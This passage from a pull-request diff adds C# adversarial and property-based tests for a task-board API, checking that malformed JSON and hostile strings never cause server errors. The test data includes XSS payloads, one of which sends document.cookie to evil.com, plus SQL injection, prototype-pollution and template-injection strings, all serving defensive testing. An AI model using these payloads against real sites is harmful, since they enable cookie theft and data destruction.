### PR TITLE
test: property-based and adversarial input tests (#717)

### DIFF
--- a/backend/tests/Taskdeck.Api.Tests/RawJsonAdversarialApiTests.cs
+++ b/backend/tests/Taskdeck.Api.Tests/RawJsonAdversarialApiTests.cs
@@ -1,0 +1,359 @@
+using System.Net;
+using System.Net.Http.Json;
+using System.Text;
+using FluentAssertions;
+using Taskdeck.Api.Tests.Support;
+using Taskdeck.Application.DTOs;
+using Xunit;
+
+namespace Taskdeck.Api.Tests;
+
+/// <summary>
+/// Adversarial tests that send raw JSON to API endpoints to exercise edge cases
+/// that typed DTO serialization cannot reach: floating-point positions, integer overflow,
+/// type mismatches, duplicate board names, and card description boundary values.
+/// Key property: NO 500 Internal Server Error from any malformed input.
+/// </summary>
+public class RawJsonAdversarialApiTests : IClassFixture<TestWebApplicationFactory>
+{
+    private readonly TestWebApplicationFactory _factory;
+    private readonly HttpClient _client;
+    private bool _isAuthenticated;
+
+    public RawJsonAdversarialApiTests(TestWebApplicationFactory factory)
+    {
+        _factory = factory;
+        _client = factory.CreateClient();
+    }
+
+    private async Task EnsureAuthenticatedAsync()
+    {
+        if (_isAuthenticated) return;
+        await ApiTestHarness.AuthenticateAsync(_client, "raw-json-adversarial");
+        _isAuthenticated = true;
+    }
+
+    // ─────────────────────── Card position as float/string/boundary via raw JSON ───────────────────────
+
+    [Theory]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": 3.14}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": -1}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": 2147483647}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": -2147483648}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": 9999999999999}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": \"not-a-number\"}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": null}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": true}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"position\": [1,2,3]}")]
+    public async Task CreateCard_WithAdversarialPosition_NeverReturns500(string bodyTemplate)
+    {
+        await EnsureAuthenticatedAsync();
+
+        // Create board and column
+        var boardResponse = await _client.PostAsJsonAsync("/api/boards",
+            new CreateBoardDto($"pos-test-{Guid.NewGuid():N}", null));
+        boardResponse.StatusCode.Should().Be(HttpStatusCode.Created);
+        var board = await boardResponse.Content.ReadFromJsonAsync<BoardDto>();
+
+        var colResponse = await _client.PostAsJsonAsync(
+            $"/api/boards/{board!.Id}/columns",
+            new CreateColumnDto(board.Id, "TestCol", null, null));
+        colResponse.StatusCode.Should().Be(HttpStatusCode.Created);
+        var col = await colResponse.Content.ReadFromJsonAsync<ColumnDto>();
+
+        // Substitute actual IDs into the raw JSON
+        var body = bodyTemplate
+            .Replace("BOARD_ID", board.Id.ToString())
+            .Replace("COL_ID", col!.Id.ToString());
+
+        var content = new StringContent(body, Encoding.UTF8, "application/json");
+        var response = await _client.PostAsync($"/api/boards/{board.Id}/cards", content);
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            $"Card creation returned 500 for position edge case: {bodyTemplate}");
+    }
+
+    // ─────────────────────── Card description adversarial content via API ───────────────────────
+
+    [Theory]
+    [InlineData("")]
+    [InlineData("\u0000\u0001\u0002\u0003")]
+    [InlineData("<script>alert(document.cookie)</script>")]
+    [InlineData("<img src=x onerror=\"fetch('//evil.com?c='+document.cookie)\">")]
+    [InlineData("<svg><animate onbegin=alert(1) attributeName=x dur=1s>")]
+    [InlineData("'; DROP TABLE cards; --")]
+    [InlineData("\uFEFF\u200B\u202E\u0301")]
+    [InlineData("{\"__proto__\":{\"isAdmin\":true}}")]
+    [InlineData("{{constructor.constructor('return this')()}}")]
+    [InlineData("${7*7}")]
+    [InlineData("#{7*7}")]
+    public async Task CreateCard_WithAdversarialDescription_NeverReturns500(string description)
+    {
+        await EnsureAuthenticatedAsync();
+
+        var boardResponse = await _client.PostAsJsonAsync("/api/boards",
+            new CreateBoardDto($"desc-test-{Guid.NewGuid():N}", null));
+        boardResponse.StatusCode.Should().Be(HttpStatusCode.Created);
+        var board = await boardResponse.Content.ReadFromJsonAsync<BoardDto>();
+
+        var colResponse = await _client.PostAsJsonAsync(
+            $"/api/boards/{board!.Id}/columns",
+            new CreateColumnDto(board.Id, "TestCol", null, null));
+        colResponse.StatusCode.Should().Be(HttpStatusCode.Created);
+        var col = await colResponse.Content.ReadFromJsonAsync<ColumnDto>();
+
+        var response = await _client.PostAsJsonAsync(
+            $"/api/boards/{board.Id}/cards",
+            new CreateCardDto(board.Id, col!.Id, "ValidTitle", description, null, null));
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            $"Card creation returned 500 for description: {description}");
+
+        if (response.IsSuccessStatusCode)
+        {
+            var card = await response.Content.ReadFromJsonAsync<CardDto>();
+            card.Should().NotBeNull();
+            card!.Description.Should().Be(description,
+                "adversarial description should be stored verbatim");
+        }
+    }
+
+    // ─────────────────────── Card description boundary lengths ───────────────────────
+
+    [Theory]
+    [InlineData(0)]
+    [InlineData(1)]
+    [InlineData(2000)]
+    [InlineData(2001)]
+    [InlineData(100_000)]
+    public async Task CreateCard_WithVariousDescriptionLengths_NeverReturns500(int length)
+    {
+        await EnsureAuthenticatedAsync();
+
+        var boardResponse = await _client.PostAsJsonAsync("/api/boards",
+            new CreateBoardDto($"desc-len-{Guid.NewGuid():N}", null));
+        boardResponse.StatusCode.Should().Be(HttpStatusCode.Created);
+        var board = await boardResponse.Content.ReadFromJsonAsync<BoardDto>();
+
+        var colResponse = await _client.PostAsJsonAsync(
+            $"/api/boards/{board!.Id}/columns",
+            new CreateColumnDto(board.Id, "TestCol", null, null));
+        colResponse.StatusCode.Should().Be(HttpStatusCode.Created);
+        var col = await colResponse.Content.ReadFromJsonAsync<ColumnDto>();
+
+        var description = length == 0 ? "" : new string('d', length);
+        var response = await _client.PostAsJsonAsync(
+            $"/api/boards/{board.Id}/cards",
+            new CreateCardDto(board.Id, col!.Id, "ValidTitle", description, null, null));
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            $"Card creation returned 500 for description of {length} chars");
+    }
+
+    // ─────────────────────── Duplicate board names ───────────────────────
+
+    [Fact]
+    public async Task CreateBoard_DuplicateNames_DoesNotReturn500()
+    {
+        await EnsureAuthenticatedAsync();
+
+        var name = $"duplicate-test-{Guid.NewGuid():N}";
+
+        var first = await _client.PostAsJsonAsync("/api/boards", new CreateBoardDto(name, null));
+        first.StatusCode.Should().Be(HttpStatusCode.Created);
+
+        // Second board with same name
+        var second = await _client.PostAsJsonAsync("/api/boards", new CreateBoardDto(name, null));
+        ((int)second.StatusCode).Should().BeLessThan(500,
+            "Duplicate board name should not cause 500");
+    }
+
+    [Fact]
+    public async Task CreateBoard_DuplicateUnicodeNames_DoesNotReturn500()
+    {
+        await EnsureAuthenticatedAsync();
+
+        var unicodeNames = new[]
+        {
+            "田中太郎のボード",
+            "مرحبا بالعالم",
+            "👨‍👩‍👧‍👦 Family Board",
+            "Board\u200BName",  // zero-width space
+            "e\u0301",          // combining character
+        };
+
+        foreach (var name in unicodeNames)
+        {
+            var first = await _client.PostAsJsonAsync("/api/boards", new CreateBoardDto(name, null));
+            ((int)first.StatusCode).Should().BeLessThan(500,
+                $"First board creation with unicode name '{name}' should not return 500");
+
+            var second = await _client.PostAsJsonAsync("/api/boards", new CreateBoardDto(name, null));
+            ((int)second.StatusCode).Should().BeLessThan(500,
+                $"Duplicate unicode board name '{name}' should not return 500");
+        }
+    }
+
+    // ─────────────────────── Card creation with extra unknown fields ───────────────────────
+
+    [Theory]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"__proto__\": {\"admin\": true}}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"constructor\": {\"prototype\": {}}}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"unknownField1\": \"val1\", \"unknownField2\": 42}")]
+    [InlineData("{\"boardId\": \"BOARD_ID\", \"columnId\": \"COL_ID\", \"title\": \"test\", \"isAdmin\": true, \"role\": \"superuser\"}")]
+    public async Task CreateCard_WithExtraUnknownFields_NeverReturns500(string bodyTemplate)
+    {
+        await EnsureAuthenticatedAsync();
+
+        var boardResponse = await _client.PostAsJsonAsync("/api/boards",
+            new CreateBoardDto($"extra-fields-{Guid.NewGuid():N}", null));
+        boardResponse.StatusCode.Should().Be(HttpStatusCode.Created);
+        var board = await boardResponse.Content.ReadFromJsonAsync<BoardDto>();
+
+        var colResponse = await _client.PostAsJsonAsync(
+            $"/api/boards/{board!.Id}/columns",
+            new CreateColumnDto(board.Id, "TestCol", null, null));
+        colResponse.StatusCode.Should().Be(HttpStatusCode.Created);
+        var col = await colResponse.Content.ReadFromJsonAsync<ColumnDto>();
+
+        var body = bodyTemplate
+            .Replace("BOARD_ID", board.Id.ToString())
+            .Replace("COL_ID", col!.Id.ToString());
+
+        var content = new StringContent(body, Encoding.UTF8, "application/json");
+        var response = await _client.PostAsync($"/api/boards/{board.Id}/cards", content);
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            $"Card creation with extra fields returned 500: {bodyTemplate}");
+    }
+
+    // ─────────────────────── Board creation with extra unknown fields ───────────────────────
+
+    [Theory]
+    [InlineData("{\"name\": \"test\", \"__proto__\": {\"admin\": true}}")]
+    [InlineData("{\"name\": \"test\", \"constructor\": {\"prototype\": {}}}")]
+    [InlineData("{\"name\": \"test\", \"extraField\": \"ignored\", \"anotherExtra\": [1,2,3]}")]
+    public async Task CreateBoard_WithExtraUnknownFields_NeverReturns500(string body)
+    {
+        await EnsureAuthenticatedAsync();
+
+        var content = new StringContent(body, Encoding.UTF8, "application/json");
+        var response = await _client.PostAsync("/api/boards", content);
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            $"Board creation with extra fields returned 500: {body}");
+    }
+
+    // ─────────────────────── Chat session creation with adversarial title ───────────────────────
+
+    [Theory]
+    [InlineData("<script>alert('xss')</script>")]
+    [InlineData("'; DROP TABLE chat_sessions; --")]
+    [InlineData("\u0000\uFEFF\u200B")]
+    [InlineData("👨‍👩‍👧‍👦")]
+    [InlineData("{\"nested\": true}")]
+    [InlineData("")]
+    [InlineData(" ")]
+    public async Task CreateChatSession_WithAdversarialTitle_NeverReturns500(string title)
+    {
+        await EnsureAuthenticatedAsync();
+
+        var boardId = await ApiTestHarness.CreateBoardWithColumnAsync(_client, "chat-adversarial");
+
+        var response = await _client.PostAsJsonAsync("/api/llm/chat/sessions",
+            new CreateChatSessionDto(title, boardId));
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            $"Chat session creation returned 500 for title: {title}");
+    }
+
+    // ─────────────────────── Chat message with adversarial content ───────────────────────
+
+    [Theory]
+    [InlineData("<script>alert('xss')</script>")]
+    [InlineData("'; DROP TABLE chat_messages; --")]
+    [InlineData("\u0000\u0001\u0002")]
+    [InlineData("👨‍👩‍👧‍👦 emoji message")]
+    [InlineData("{\"action\": \"delete\", \"target\": \"all_boards\"}")]
+    [InlineData("")]
+    [InlineData(" ")]
+    public async Task SendChatMessage_WithAdversarialContent_NeverReturns500(string messageContent)
+    {
+        await EnsureAuthenticatedAsync();
+
+        var boardId = await ApiTestHarness.CreateBoardWithColumnAsync(_client, "chat-msg-adversarial");
+
+        // Create session
+        var sessionResponse = await _client.PostAsJsonAsync("/api/llm/chat/sessions",
+            new CreateChatSessionDto("Test Session", boardId));
+
+        if (!sessionResponse.IsSuccessStatusCode) return; // Skip if session creation fails
+
+        var session = await sessionResponse.Content.ReadFromJsonAsync<ChatSessionDto>();
+
+        var response = await _client.PostAsJsonAsync(
+            $"/api/llm/chat/sessions/{session!.Id}/messages",
+            new SendChatMessageDto(messageContent));
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            $"Chat message sending returned 500 for content: {messageContent}");
+    }
+
+    // ─────────────────────── Capture creation with binary-like content ───────────────────────
+
+    [Fact]
+    public async Task CaptureItem_WithAllControlChars_NeverReturns500()
+    {
+        await EnsureAuthenticatedAsync();
+
+        // Generate a string with all ASCII control characters (0-31)
+        var chars = new char[32];
+        for (int i = 0; i < 32; i++)
+        {
+            chars[i] = (char)i;
+        }
+        var controlString = "prefix" + new string(chars) + "suffix";
+
+        var response = await _client.PostAsJsonAsync("/api/capture/items",
+            new CreateCaptureItemDto(null, controlString));
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            "Capture with all control characters should not return 500");
+    }
+
+    [Fact]
+    public async Task CaptureItem_WithEveryUnicodeBlockSample_NeverReturns500()
+    {
+        await EnsureAuthenticatedAsync();
+
+        // Sample from major Unicode blocks
+        var unicodeSamples = new[]
+        {
+            "\u0041",        // Basic Latin (A)
+            "\u00C0",        // Latin Extended-A
+            "\u0100",        // Latin Extended-B
+            "\u0370",        // Greek
+            "\u0400",        // Cyrillic
+            "\u0500",        // Cyrillic Supplement
+            "\u0590",        // Hebrew
+            "\u0600",        // Arabic
+            "\u0900",        // Devanagari
+            "\u0E00",        // Thai
+            "\u1100",        // Hangul Jamo
+            "\u3000",        // CJK Symbols
+            "\u4E00",        // CJK Unified
+            "\uAC00",        // Hangul Syllables
+            "\uFE00",        // Variation Selectors
+            "\uFF00",        // Halfwidth/Fullwidth
+            "\uFFFD",        // Replacement Character
+            "\U0001F600",    // Emoticons (surrogate pair)
+        };
+
+        var text = string.Join(" ", unicodeSamples);
+        var response = await _client.PostAsJsonAsync("/api/capture/items",
+            new CreateCaptureItemDto(null, text));
+
+        ((int)response.StatusCode).Should().BeLessThan(500,
+            "Capture with Unicode block samples should not return 500");
+    }
+}

--- a/backend/tests/Taskdeck.Api.Tests/RawJsonAdversarialApiTests.cs
+++ b/backend/tests/Taskdeck.Api.Tests/RawJsonAdversarialApiTests.cs
@@ -287,7 +287,10 @@ public class RawJsonAdversarialApiTests : IClassFixture<TestWebApplicationFactor
         var sessionResponse = await _client.PostAsJsonAsync("/api/llm/chat/sessions",
             new CreateChatSessionDto("Test Session", boardId));
 
-        if (!sessionResponse.IsSuccessStatusCode) return; // Skip if session creation fails
+        ((int)sessionResponse.StatusCode).Should().BeLessThan(500,
+            $"Chat session creation returned 500 for content: {messageContent}");
+
+        if (!sessionResponse.IsSuccessStatusCode) return; // Skip if session creation returns 4xx
 
         var session = await sessionResponse.Content.ReadFromJsonAsync<ChatSessionDto>();
 

--- a/backend/tests/Taskdeck.Application.Tests/Fuzz/ChatDtoSerializationFuzzTests.cs
+++ b/backend/tests/Taskdeck.Application.Tests/Fuzz/ChatDtoSerializationFuzzTests.cs
@@ -1,0 +1,216 @@
+using System.Text.Json;
+using FluentAssertions;
+using FsCheck;
+using FsCheck.Fluent;
+using FsCheck.Xunit;
+using Taskdeck.Application.DTOs;
+using Taskdeck.Domain.Entities;
+using Xunit;
+
+namespace Taskdeck.Application.Tests.Fuzz;
+
+/// <summary>
+/// Property-based JSON serialization round-trip tests for Chat DTOs.
+/// Key property: serialize then deserialize produces identical object.
+/// Exercises adversarial string content in titles, messages, and metadata.
+/// </summary>
+public class ChatDtoSerializationFuzzTests
+{
+    private const int MaxTests = 200;
+
+    private static readonly JsonSerializerOptions JsonOptions = new()
+    {
+        PropertyNamingPolicy = JsonNamingPolicy.CamelCase,
+        PropertyNameCaseInsensitive = true,
+        WriteIndented = false
+    };
+
+    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        Gen.Constant("\u0000"),
+        Gen.Constant("\uFEFF"),
+        Gen.Constant("\u200B"),
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("'; DROP TABLE chat; --"),
+        Gen.Constant("\"quoted\"string\""),
+        Gen.Constant("back\\slash"),
+        Gen.Constant("new\nline\ttab"),
+        Gen.Constant("emoji 👨‍👩‍👧‍👦"),
+        Gen.Constant("田中太郎"),
+        Gen.Constant("مرحبا"),
+        Gen.Constant("{\"nested\": true}"),
+        Gen.Constant(""),
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    private static Gen<string?> NullableStringGen() => Gen.OneOf(
+        Gen.Constant((string?)null),
+        AdversarialStringGen().Select(s => (string?)s)
+    );
+
+    private static Gen<ChatMessageRole> RoleGen() =>
+        Gen.Elements(ChatMessageRole.User, ChatMessageRole.Assistant, ChatMessageRole.System);
+
+    private static Gen<ChatSessionStatus> StatusGen() =>
+        Gen.Elements(ChatSessionStatus.Active, ChatSessionStatus.Archived);
+
+    // ─────────────────────── ChatSessionDto round-trip ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ChatSessionDto_RoundTrip_PreservesAllFields()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            Arb.From(StatusGen()),
+            (title, status) =>
+            {
+                var dto = new ChatSessionDto(
+                    Guid.NewGuid(),
+                    Guid.NewGuid(),
+                    Guid.NewGuid(),
+                    title,
+                    status,
+                    DateTimeOffset.UtcNow,
+                    DateTimeOffset.UtcNow,
+                    new List<ChatMessageDto>());
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<ChatSessionDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.Title.Should().Be(title);
+                deserialized.Status.Should().Be(status);
+                deserialized.Id.Should().Be(dto.Id);
+                deserialized.UserId.Should().Be(dto.UserId);
+                deserialized.BoardId.Should().Be(dto.BoardId);
+            });
+    }
+
+    // ─────────────────────── ChatMessageDto round-trip ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ChatMessageDto_RoundTrip_PreservesAllFields()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            Arb.From(RoleGen()),
+            Arb.From(NullableStringGen()),
+            (content, role, degradedReason) =>
+            {
+                var dto = new ChatMessageDto(
+                    Guid.NewGuid(),
+                    Guid.NewGuid(),
+                    role,
+                    content,
+                    "text",
+                    null,
+                    42,
+                    DateTimeOffset.UtcNow,
+                    degradedReason);
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<ChatMessageDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.Content.Should().Be(content);
+                deserialized.Role.Should().Be(role);
+                deserialized.DegradedReason.Should().Be(degradedReason);
+                deserialized.MessageType.Should().Be("text");
+                deserialized.TokenUsage.Should().Be(42);
+            });
+    }
+
+    // ─────────────────────── CreateChatSessionDto round-trip ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property CreateChatSessionDto_RoundTrip_Identity()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            title =>
+            {
+                var dto = new CreateChatSessionDto(title, Guid.NewGuid());
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<CreateChatSessionDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.Title.Should().Be(title);
+                deserialized.BoardId.Should().Be(dto.BoardId);
+            });
+    }
+
+    // ─────────────────────── SendChatMessageDto round-trip ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property SendChatMessageDto_RoundTrip_Identity()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            ArbMap.Default.ArbFor<bool>(),
+            (content, requestProposal) =>
+            {
+                var dto = new SendChatMessageDto(content, requestProposal);
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<SendChatMessageDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.Content.Should().Be(content);
+                deserialized.RequestProposal.Should().Be(requestProposal);
+            });
+    }
+
+    // ─────────────────────── ChatSessionDto with messages list ───────────────────────
+
+    [Property(MaxTest = MaxTests)]
+    public Property ChatSessionDto_WithMessages_RoundTrip()
+    {
+        return Prop.ForAll(
+            Arb.From(AdversarialStringGen()),
+            Arb.From(AdversarialStringGen()),
+            (title, msgContent) =>
+            {
+                var messages = new List<ChatMessageDto>
+                {
+                    new(Guid.NewGuid(), Guid.NewGuid(), ChatMessageRole.User,
+                        msgContent, "text", null, null, DateTimeOffset.UtcNow),
+                    new(Guid.NewGuid(), Guid.NewGuid(), ChatMessageRole.Assistant,
+                        title, "text", Guid.NewGuid(), 100, DateTimeOffset.UtcNow)
+                };
+
+                var dto = new ChatSessionDto(
+                    Guid.NewGuid(), Guid.NewGuid(), null, title,
+                    ChatSessionStatus.Active, DateTimeOffset.UtcNow, DateTimeOffset.UtcNow,
+                    messages);
+
+                var json = JsonSerializer.Serialize(dto, JsonOptions);
+                var deserialized = JsonSerializer.Deserialize<ChatSessionDto>(json, JsonOptions);
+
+                deserialized.Should().NotBeNull();
+                deserialized!.RecentMessages.Should().HaveCount(2);
+                deserialized.RecentMessages[0].Content.Should().Be(msgContent);
+                deserialized.RecentMessages[1].Content.Should().Be(title);
+            });
+    }
+
+    // ─────────────────────── Malformed JSON deserialization ───────────────────────
+
+    [Theory]
+    [InlineData("{}")]
+    [InlineData("{\"title\": null}")]
+    [InlineData("{\"extra_field\": \"value\"}")]
+    [InlineData("{\"title\": 12345}")]
+    [InlineData("null")]
+    public void CreateChatSessionDto_MalformedJson_HandledGracefully(string json)
+    {
+        try
+        {
+            var result = JsonSerializer.Deserialize<CreateChatSessionDto>(json, JsonOptions);
+            // If it deserializes, that's fine — API layer validates
+        }
+        catch (JsonException)
+        {
+            // Expected for truly malformed JSON
+        }
+    }
+}

--- a/backend/tests/Taskdeck.Application.Tests/Fuzz/ChatDtoSerializationFuzzTests.cs
+++ b/backend/tests/Taskdeck.Application.Tests/Fuzz/ChatDtoSerializationFuzzTests.cs
@@ -25,28 +25,6 @@ public class ChatDtoSerializationFuzzTests
         WriteIndented = false
     };
 
-    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
-        Gen.Constant("\u0000"),
-        Gen.Constant("\uFEFF"),
-        Gen.Constant("\u200B"),
-        Gen.Constant("<script>alert('xss')</script>"),
-        Gen.Constant("'; DROP TABLE chat; --"),
-        Gen.Constant("\"quoted\"string\""),
-        Gen.Constant("back\\slash"),
-        Gen.Constant("new\nline\ttab"),
-        Gen.Constant("emoji 👨‍👩‍👧‍👦"),
-        Gen.Constant("田中太郎"),
-        Gen.Constant("مرحبا"),
-        Gen.Constant("{\"nested\": true}"),
-        Gen.Constant(""),
-        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
-    );
-
-    private static Gen<string?> NullableStringGen() => Gen.OneOf(
-        Gen.Constant((string?)null),
-        AdversarialStringGen().Select(s => (string?)s)
-    );
-
     private static Gen<ChatMessageRole> RoleGen() =>
         Gen.Elements(ChatMessageRole.User, ChatMessageRole.Assistant, ChatMessageRole.System);
 
@@ -59,7 +37,7 @@ public class ChatDtoSerializationFuzzTests
     public Property ChatSessionDto_RoundTrip_PreservesAllFields()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
             Arb.From(StatusGen()),
             (title, status) =>
             {
@@ -91,9 +69,9 @@ public class ChatDtoSerializationFuzzTests
     public Property ChatMessageDto_RoundTrip_PreservesAllFields()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
             Arb.From(RoleGen()),
-            Arb.From(NullableStringGen()),
+            Arb.From(FuzzTestGenerators.NullableStringGen()),
             (content, role, degradedReason) =>
             {
                 var dto = new ChatMessageDto(
@@ -125,7 +103,7 @@ public class ChatDtoSerializationFuzzTests
     public Property CreateChatSessionDto_RoundTrip_Identity()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
             title =>
             {
                 var dto = new CreateChatSessionDto(title, Guid.NewGuid());
@@ -145,7 +123,7 @@ public class ChatDtoSerializationFuzzTests
     public Property SendChatMessageDto_RoundTrip_Identity()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
             ArbMap.Default.ArbFor<bool>(),
             (content, requestProposal) =>
             {
@@ -166,8 +144,8 @@ public class ChatDtoSerializationFuzzTests
     public Property ChatSessionDto_WithMessages_RoundTrip()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
-            Arb.From(AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
+            Arb.From(FuzzTestGenerators.AdversarialStringGen()),
             (title, msgContent) =>
             {
                 var messages = new List<ChatMessageDto>

--- a/backend/tests/Taskdeck.Application.Tests/Fuzz/FuzzTestGenerators.cs
+++ b/backend/tests/Taskdeck.Application.Tests/Fuzz/FuzzTestGenerators.cs
@@ -1,0 +1,63 @@
+using FsCheck;
+using FsCheck.Fluent;
+
+namespace Taskdeck.Application.Tests.Fuzz;
+
+/// <summary>
+/// Shared FsCheck generators for DTO serialization fuzz tests.
+/// Centralises adversarial string generation so all fuzz tests
+/// exercise the same comprehensive input space.
+/// </summary>
+internal static class FuzzTestGenerators
+{
+    /// <summary>
+    /// Generates adversarial strings covering: Unicode edge cases (null byte, BOM,
+    /// replacement char, surrogates, zero-width, combining, CJK, Arabic, emoji),
+    /// control characters (bell, backspace, ANSI escape, CRLF), XSS/injection payloads,
+    /// JSON-sensitive characters (quotes, backslashes), length boundaries (empty,
+    /// whitespace), explicit null, and FsCheck random strings.
+    /// </summary>
+    public static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        // Unicode edge cases
+        Gen.Constant("\u0000"),                        // null byte
+        Gen.Constant("\uFEFF"),                        // BOM
+        Gen.Constant("\uFFFD"),                        // replacement character
+        Gen.Constant("\u200B"),                        // zero-width space
+        Gen.Constant("\u202E"),                        // right-to-left override
+        Gen.Constant("\u0301"),                        // combining accent
+        Gen.Constant("\U0001F468\u200D\U0001F469\u200D\U0001F467\u200D\U0001F466"), // family emoji
+        Gen.Constant("\u7530\u4E2D\u592A\u90CE"),      // CJK
+        Gen.Constant("\u0645\u0631\u062D\u0628\u0627"), // Arabic RTL
+
+        // JSON-sensitive characters
+        Gen.Constant("\"quoted\"string\""),
+        Gen.Constant("back\\slash"),
+        Gen.Constant("new\nline\ttab"),
+        Gen.Constant("null\x00byte"),
+
+        // XSS/injection payloads
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("'; DROP TABLE boards; --"),
+        Gen.Constant("{\"nested\": true}"),
+        Gen.Constant("{{constructor.constructor('return this')()}}"),
+        Gen.Constant("${7*7}"),
+
+        // Length boundary strings
+        Gen.Constant(""),
+        Gen.Constant(" "),
+
+        // Explicit null
+        Gen.Constant((string)null!),
+
+        // Arbitrary from FsCheck
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    /// <summary>
+    /// Wraps <see cref="AdversarialStringGen"/> as nullable for optional-field testing.
+    /// </summary>
+    public static Gen<string?> NullableStringGen() => Gen.OneOf(
+        Gen.Constant((string?)null),
+        AdversarialStringGen().Select(s => (string?)s)
+    );
+}

--- a/backend/tests/Taskdeck.Application.Tests/Fuzz/NotificationDtoSerializationFuzzTests.cs
+++ b/backend/tests/Taskdeck.Application.Tests/Fuzz/NotificationDtoSerializationFuzzTests.cs
@@ -1,0 +1,220 @@
+using System.Text.Json;
+using FluentAssertions;
+using FsCheck;
+using FsCheck.Fluent;
+using FsCheck.Xunit;
+using Taskdeck.Application.DTOs;
+using Taskdeck.Domain.Entities;
+using Xunit;
+
+namespace Taskdeck.Application.Tests.Fuzz;
+
+/// <summary>
+/// Property-based JSON serialization round-trip tests for Notification DTOs.
+/// Key property: serialize then deserialize produces identical object for all input content.
+/// </summary>
+public class NotificationDtoSerializationFuzzTests
+{
+    private const int MaxTests = 200;
+
+    private static readonly JsonSerializerOptions JsonOptions = new()
+    {
+        PropertyNamingPolicy = JsonNamingPolicy.CamelCase,
+        PropertyNameCaseInsensitive = true,
+        WriteIndented = false
+    };
+
+    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
+        Gen.Constant("\u0000"),
+        Gen.Constant("\uFEFF"),
+        Gen.Constant("\u200B"),
+        Gen.Constant("<script>alert('xss')</script>"),
+        Gen.Constant("'; DROP TABLE notifications; --"),
+        Gen.Constant("\"quoted\""),
+        Gen.Constant("back\\slash"),
+        Gen.Constant("new\nline"),
+        Gen.Constant("emoji 👨‍👩‍👧‍👦"),
+        Gen.Constant("田中太郎"),
+        Gen.Constant("{\"nested\": true}"),
+        Gen.Constant(""),
+        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
+    );
+
+    private static Gen<string?> NullableStringGen() => Gen.OneOf(
+        Gen.Constant((string?)null),
+        AdversarialStringGen().Select(s => (string?)s)
+    );
+
+    private static Gen<NotificationType> TypeGen() =>
+        Gen.Elements(
+            NotificationType.Mention,
+            NotificationType.Assignment,
+            NotificationType.ProposalOutcome,
+            NotificationType.BoardChange,
+            NotificationType.System);
+
+    private static Gen<NotificationCadence> CadenceGen() =>
